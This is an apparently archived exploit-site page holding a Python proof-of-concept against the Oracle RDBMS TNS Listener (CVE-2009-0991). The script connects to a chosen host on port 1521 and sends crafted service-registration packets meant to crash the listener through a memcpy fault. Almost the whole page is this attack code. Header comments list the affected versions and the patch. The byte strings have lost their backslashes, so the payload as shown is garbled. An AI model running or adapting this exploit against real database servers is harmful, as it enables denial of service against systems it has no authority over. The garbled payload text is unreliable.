Home / os / win10

oraclerdbms-poc.txt

Posted on 21 April 2009

# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process
# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)

# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied

# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>

# Fixed in CPUapr2009, CVE-2009-0991
# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html

from sys import *
from socket import *

sockobj = socket(AF_INET, SOCK_STREAM)

sockobj.connect ((argv[1], 1521))

sockobj.send(
"x00x68x00x00x01x00x00x00x01x3Ax01x2Cx00x00x20x00"
"x7FxFFxC6x0Ex00x00x01x00x00x2Ex00x3Ax00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x28x43x4Fx4Ex4Ex45"
"x43x54x5Fx44x41x54x41x3Dx28x43x4Fx4Dx4Dx41x4Ex44"
"x3Dx73x65x72x76x69x63x65x5Fx72x65x67x69x73x74x65"
"x72x5Fx4Ex53x47x52x29x29")

data=sockobj.recv(102400)

sockobj.send(
"x02xdex00x00x06x00x00x00x00x00x00x00x02xd4x20x08"
"xffx03x01x00x12x34x34x34x34x34x78x10x10x32x10x32"
"x10x32x10x32x10x32x54x76x00x78x10x32x54x76x44x00"
"x00x80x02x00x00x00x00x04x00x00x70xe4xa5x09x90x00"
"x23x00x00x00x42x45x43x37x36x43x32x43x43x31x33x36"
"x2dx35x46x39x46x2dx45x30x33x34x2dx30x30x30x33x42"
"x41x31x33x37x34x42x33x03x00x65x00x01x00x01x00x00"
"x00x00x00x00x00x00x64x02x00x80x05x00x00x00x00x04"
"x00x00x00x00x00x00x01x00x00x00x10x00x00x00x02x00"
"x00x00x84xc3xccx07x01x00x00x00x84x2fxa6x09x00x00"
"x00x00x44xa5xa2x09x25x98x18xe9x28x50x4fx28xbbxac"
"x15x56x8ex68x1dx6dx05x00x00x00xfcxa9x36x22x0fx00"
"x00x00x60x30xa6x09x0ax00x00x00x64x00x00x00x00x00"
"x00x00xaax00x00x00x00x01x00x00x17x00x00x00x78xc3"
"xccx07x6fx72x63x6cx00x28x48x4fx53x54x3dx77x69x6e"
"x32x30x30x33x29x00x01x00x00x00x09x00x00x00x01x00"
"x00x00x50xc5x2fx22x02x00x00x00x34xc5x2fx22x00x00"
"x00x00x9cxc5xccx07x6fx72x63x6cx5fx58x50x54x00x09"
"x00x00x00x50xc5x2fx22x04x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x34xc5xccx07x6fx72x63x6cx5f"
"x58x50x54x00x01x00x00x00x05x00x00x00x01x00x00x00"
"x84xc5x2fx22x02x00x00x00x68xc5x2fx22x00x00x00x00"
"xa4xa5xa2x09x6fx72x63x6cx00x05x00x00x00x84xc5x2f"
"x22x04x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00xfcxc4xccx07x6fx72x63x6cx00x01x00x00x00x10x00"
"x00x00x02x00x00x00xbcxc3xccx07x00x00x00x00xb0x2f"
"xa6x09x00x00x00x00x00x00x00x00x89xc0xb1xc3x08x1d"
"x46x6dxb6xcfxd1xddx2cxa7x66x6dx0ax00x00x00x78x2b"
"xbcx04x7fx00x00x00x64xa7xa2x09x0dx00x00x00x20x2c"
"xbcx04x11x00x00x00x95x00x00x00x02x20x00x80x03x00"
"x00x00x98xc5x2fx22x00x00x00x00x00x00x00x00x0ax00"
"x00x00xb0xc3xccx07x44x45x44x49x43x41x54x45x44x00"
"x28x41x44x44x52x45x53x53x3dx28x50x52x4fx54x4fx43"
"x4fx4cx3dx42x45x51x29x28x50x52x4fx47x52x41x4dx3d"
"x43x3ax5cx61x70x70x5cx41x64x6dx69x6ex69x73x74x72"
"x61x74x6fx72x5cx70x72x6fx64x75x63x74x5cx31x31x2e"
"x31x2ex30x5cx64x62x5fx31x5cx62x69x6ex5cx6fx72x61"
"x63x6cx65x2ex65x78x65x29x28x41x52x47x56x30x3dx6f"
"x72x61x63x6cx65x6fx72x63x6cx29x28x41x52x47x53x3d"
"x27x28x4cx4fx43x41x4cx3dx4ex4fx29x27x29x29x00x4c"
"x4fx43x41x4cx20x53x45x52x56x45x52x00x68xc5x2fx22"
"x34xc5x2fx22x00x00x00x00x05x00x00x00x84xc5x2fx22"
"x04x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xfcxc4xccx07x6fx72x63x6cx00x09x00x00x00x50xc5x2f"
"x22x04x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x34xc5xccx07x6fx72x63x6cx5fx58x50x54x00"
)

sockobj.close()

 

TOP